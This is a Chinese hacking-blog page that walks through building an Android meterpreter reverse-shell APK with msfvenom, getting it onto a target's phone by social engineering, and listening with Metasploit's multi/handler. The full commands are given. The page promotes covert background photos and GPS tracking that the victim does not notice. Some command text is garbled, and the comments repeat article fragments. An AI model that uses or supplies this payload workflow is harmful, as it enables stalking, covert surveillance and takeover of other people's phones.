当前位置:首页 > 黑客技术 > 正文内容

手机定位录音追踪器(放手机里的微型定位器)

访客3年前 (2022-01-01)黑客技术1011

手机定位录音追踪器(放手机里的微型定位器)MsfvenomKali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msf

手机定位录音追踪器(放手机里的微型定位器)

Msfvenom

Kali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。

比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msfvenom,接下来我们看看使用的 *** 。


生成安卓远控

kali终端下输入:

msfvenom -h 查看使用帮助

其中我们要关注的参数是,-p(指定攻击有效载荷)-f(指定生成文件的格式)

msfvenom -l payload *** sfvenom -l formats

生成远控的完整命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=8888 R> test.apk

这里没有使用-f参数,生成安卓可执行程序,可以不用。

部署可执行程序

将生成的安卓远控app安装在目标靶机中,可以通过搭建服务器,让目标下载安装apk。


使用metasploit进行监听

启动msf

Kali终端下输入:msfconsole

继续输入:

use exploit/multi/handler

本模块专门用于设置独立的连接受理程序,这是我们寻找的最后一块拼图!在这种使用远控载荷的情况下,设置multi/handler是必须的,否则无法进程远程控制。

为该模块设置参数:

show optionsset LHOST 192.168.31.111set lport 8888

这里的设置必须和前面用msfvenom的设置保持一致。

run执行侦听,等待上线

得到meterpreter会话

一旦目标安卓手机(靶机)用户点击了我们生成的test.apk图标,我们的kali就会监听到连接信号,得到一个远程控制目标(靶机)手机的meterpreter会话。

输入"?"即可显示所有远程控制安卓手机的命令,我们这里选择最精彩的三个:

远程拍照:目标手机不会有任何察觉,属于后台系统拍照;

gps定位:直接显示经纬度地理位置,非常精准;


扫描二维码推送至手机访问。

版权声明:本文由黑客技术发布,如需转载请注明出处。

本文链接:https://w-123.com/104278.html

“手机定位录音追踪器(放手机里的微型定位器)” 的相关文章

CISA 与 FBI 在 Viasat 网络攻击后发出警告 美国卫星通讯亦面临安全威胁

因担心俄乌冲突引发的近期针对欧洲卫星网络发起的攻击可能很快蔓延到美国本土,政府机构已经向卫星通信网络运营商发出了“潜在威胁”预警。在美国网络安全与基础设施安全局(CISA)和联邦调查局(FBI)本周联合发布的一份公告中,其敦促卫星通讯(SATCOM)网络提供商和基础设施组织加强安全防御。若被入侵,或...

开源模块维护者破坏代码,只为抗议乌克兰战争

Hackernews 编译,转载请注明出处: 一个广泛应用于 Windows、 Linux 和 Mac 环境的开源模块的维护者最近破坏了它的功能,以抗议乌克兰的战争,大众再次将注意力集中在与软件代码依赖相关的潜在的严重安全问题上。 Node-ipc 是一个用于进程间通信的 JavaScrip...

攻击者利用 DeFi 投票漏洞卷走 Beanstalk 近 1.82 亿美元加密货币

区块链分析公司 Peck Shield 于周日上午发布警告称,一名攻击者设法从 Beanstalk Farms 中提取了价值约 1.82 亿美元的加密货币。据悉,作为一个旨在平衡不同加密货币资产供需的去中心化金融(DeFi)项目,攻击者利用了 Beanstalk 的“多数投票治理系统”,这也是诸多...

一项研究显示各家汽车制造商收集了海量个人信息

大多数人都知道,现代电子设备,如智能手机、平板电脑和计算机,存储了我们个人和私人生活的一系列信息,我们不希望陌生人得到这些信息。然而,许多人没有考虑到他们的车辆信息娱乐系统和其他系统内到底储存了多少个人信息。 现在一份报告研究了全球15大汽车制造商,并调查了它们之间的数据共享政策。该研究对每个品牌2...

零日漏洞允许在 macOS 系统上运行任意命令

独立安全研究员 Park Minchan 透露,苹果 macOS Finder 中存在一个零日漏洞,攻击者可以利用这个漏洞在运行任何 macOS 版本的 Mac 系统上运行任意命令。 这个漏洞是因为 macOS 处理 inetloc 文件的方式会使它运行嵌入在其中的命令。SSD Secure Di...

安全研究人员为 ATM NFC 读卡器中存在的漏洞敲响警钟

据《连线》报道,IOActive安全研究员Josep Rodriquez警告说,许多现代ATM和POS系统中使用的NFC读卡器使它们容易受到攻击。这些缺陷使它们容易受到一系列问题的影响,包括被附近的NFC设备对撞攻击、作为勒索软件攻击的一部分而被锁定、甚至被黑客提取某些信用卡数据。 Rodriqu...

评论列表

绿邪礼忱
2年前 (2022-06-07)

序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msfvenom,接下来我们看看使用的方法。生成安卓远控kali终端下输入:msfvenom -h 查看使用帮助其中我们要关注的参数是,-p(指定攻击有效载荷)-f(指定生成文件的格式)msfve

断渊辞慾
2年前 (2022-06-08)

控制。为该模块设置参数:show optionsset LHOST 192.168.31.111set lport 8888这里的设置必须和前面用msfvenom的设置保持一致。run执行侦听,等待上线得到meterpreter会话一旦目标安卓手机(靶机)用

末屿朻安
2年前 (2022-06-08)

app安装在目标靶机中,可以通过搭建服务器,让目标下载安装apk。使用metasploit进行监听启动msfKali终端下输入:msfconsole继续输入:use exploit/multi/handler本模块专门用于设置独立的连接受

惑心一镜
2年前 (2022-06-08)

必须的,否则无法进程远程控制。为该模块设置参数:show optionsset LHOST 192.168.31.111set lport 8888这里的设置必须和前面用msfvenom的设置保持一致。run执行侦听,等待上线得到meterpreter会

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。